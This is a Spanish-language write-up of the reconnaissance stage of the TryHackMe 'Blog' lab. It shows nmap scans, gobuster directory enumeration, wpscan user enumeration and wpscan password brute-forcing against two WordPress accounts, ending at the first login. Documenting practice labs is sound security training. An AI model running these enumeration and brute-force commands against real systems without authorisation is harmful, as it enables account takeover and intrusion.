Blog - TryHackMe

Reconocimiento
Realizamos un escaneo con nmap para ver los puertos que se encuentran abiertos.
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.93.203 -oG allPorts

Aplicamos el siguiente comando para ver las versiones que estan corriendos dichos servicios con sus respectivos puertos que se encuentran abiertos y le pasamos un conjunto de script por default de nmap.
nmap -sCV -p22,80,139,445 10.10.93.203 -oN targeted

Entramos a la ip de la máquina y vemos la interfaz de la página.

Vamos a realizar dos escaneos con dos herramientas gobuster para ver directorios y wpscan para ver si encontramos algo interesante por lo que vemos que se trata de un wordpress.
Asi que realizamos los siguientes comandos
gobuster dir -u http://blog.thm/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20
Vemos ciertos directorios y una ruta de login.

Aplicamos un wpscan
wpscan --url http://10.10.93.203 --enumerate u,vp,dbe,at,cb --detection-mode aggressive

Vemos que nos identifica dos usuarios con el nombre de kwheel y bjoel. Entonces podemos tratar de conseguir la contraseña a través de fuerza bruta.
wpscan --url http://blog.thm -U kwheel -P /usr/share/wordlists/rockyou.txt
wpscan --url http://blog.thm -U bjoel -P /usr/share/wordlists/rockyou.txt

Dado que gracias a fuerza bruta nos da la contraseña, vamos a loguearnos Entramos con la cuenta de kwheel
